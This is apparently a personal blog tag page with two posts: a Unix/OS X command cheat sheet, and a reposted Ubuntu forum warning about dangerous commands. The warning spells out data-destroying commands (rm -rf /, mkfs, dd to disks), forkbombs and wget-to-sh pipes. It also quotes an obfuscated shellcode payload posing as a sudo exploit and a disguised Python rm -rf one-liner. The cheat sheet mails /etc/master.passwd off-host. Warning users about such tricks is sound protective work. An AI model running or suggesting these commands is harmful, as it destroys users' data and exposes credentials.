Kevin Hatfield's Blog

Kevin's blurry train of thought……

Posts Tagged ‘command’

UNIX Commands Cheat List!

Tuesday, January 13th, 2009


Unix commands cheat list

This is nothing more than a place for me to jot down all the *nix commands that I have a hard time remembering. It is not a tutorial, and all the information here is to be used at your own risk. The commands here are used for either freeBSD 5.3, OS X 10.3 or both.

1. Flush the DNS cache:

lookupd -flushcache

2. Run CPAN in shell mode:

perl -MCPAN -e shell

3. Start, Stop, Restart Apache:

apachectl start
apachectl stop
apachectl restart

4. Shutdown and reboot:

shutdown -R now

5. Show disk space:

df -k (in Kb)
df -m (in Mb)
df -g (in Gb)

6. Show disk usage:

du -hc

7. Show disk usage one folder deep:

du -hc -d1

8. Show running processes:

ps aux

9. Edit the Apache configurations file (for freeBSD):

pico /usr/local/etc/apache/httpd.conf

10. Edit the Apache configurations file (for OS X):

pico /private/etc/httpd/httpd.conf (for Apache 1.3)

11. Run the install utility for freeBSD:

/stand/sysinstall

12. Rebuild the access or virtualusertable databases after editing /etc/mail/access or /etc/mail/virtusertable :

make maps

13. Dump a MySQL database:

mysqldump -u USER -pPASSWORD DBNAME > filename.sql

14. Import from a dump file into MySQL:

mysql -u USER -p DBNAME < filename.sql

15. Grab your most important configuration files and email them to yourself:

tar cvfz - /etc/rc.conf /etc/master.passwd /etc/fstab /usr/local/etc | uuencode seedfiles.tgz | mail -s “Web Server Seed Files” someguy@someserver.com

16. Configure Apache 2 from source with the proper modules:

sudo ./configure --prefix=/apache2 --enable-cgi=yes --enable-cgid=yes --enable-dav=yes --enable-expires=yes --enable-headers=yes --enable-info=yes --enable-rewrite=yes --enable-so=yes --enable-speling=yes --enable-ssl=yes --enable-usertrack=yes --enable-vhost-alias=yes

17. Change the mySQL password:

mysqladmin -u root password 'new password goes here'

18. rsync for dummies:

rsync -r --stats --progress --exclude 'some wildcard' /from/some/folder /to/some/other/folder

19. PHP5 on OS X:

http://www.entropy.ch/software/macosx/php/ has a ready to run installer with every possible option turned on. Saves a hell of a lot of hassle.

20. CVS – How to set the CVSROOT in bash:

Put this in .bashrc:
CVSROOT=/usr/local/cvsroot
export CVSROOT

21. CVS – How to set your default editor to pico instead of vi:

EDITOR=pico
export EDITOR

22. CVS – Checkout

(from the folder you want to hold the checked out code)

cvs checkout project

23. CVS – Commit

(from within the working folder)

cvs commit

It will open pico so you can type an explanation of the changes commited.

24. CVS – Refresh working copy

(from within the working folder)

cvs update

I don’t trust this one 100%, so every now and then I re-check out the source.

25. Webmin

A great way to easily manage *nix servers is Webmin. I use it on both freeBSD and it is pretty damn nice. While some of its modules are a bit rustic, overall it beats the hell out of having to use the CLI for annoying stuff.

26. Split a file based on a separation string

csplit -k -f output_file_prefix source_file_name '/separation string/' {99}

99 is the number of times top repeat the command. In the unix flavor of split you can do {*}, but OS X doesn’t like it so I am setting it to 99.

27. Run the Apache Bench:

ab -n100 -c20 http://www.mydomain.com/

Where 100 is the number of iterations and 20 is the number of concurrent hits.

28. Default admin web site for Smoothwall Express:

https://smoothwall.yourdomain.com:441/

29. Recursive find:

find . -iname "*\?*"

finds anything with the escaped character (in this case a question mark) within your current folder.

30. ftp upload from command line:

This one falls under “annoying quirks of OS X.” I wasted over one hour trying to decypher the man page for ftp for 10.4 because it would not let me upload a file from a compressed one-line command within a bash script. Here is the one that worked:

ftp -u ftp://$USER:$PASSWORD@$FTPSERVER/$FTPFOLDER/$REMOTE_FILENAME $LOCAL_FILENAME

This one worked like a champ.

Tags: , , , , , ,
Posted in Daily Blog, Daily Linux Tip, Tech Blog | No Comments »

Dangerous commands for Linux users :)

Thursday, November 29th, 2007

As posted on: http://ubuntuforums.org/announcement.php?a=54

As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data — many of them will even cause damage from a LiveCD environment.

Again, DANGEROUS COMMANDS — look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn’t “feel right”.

Delete all files, delete current directory, and delete visible files in current directory. It’s quite obvious why these commands can be dangerous to execute.
Code:

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
Code:

:( ){:|:&};:

In Perl
Code:

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of GB’s, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses — benign or malevolent. Do not execute code from people you don’t trust
Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author’s homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the “hex code gibberish stuff” that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don’t need to be reading this announcement. Otherwise, remember that these things can come in very novel forms — watch out.

Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:
Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where “sn!.sg!+” is simply rm -rf * shifted a character up. Of course this is a silly example — I wouldn’t expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.
__________________

Tags: , , , , , , , ,
Posted in Daily Blog, Daily Linux Tip, Tech Blog | 1 Comment »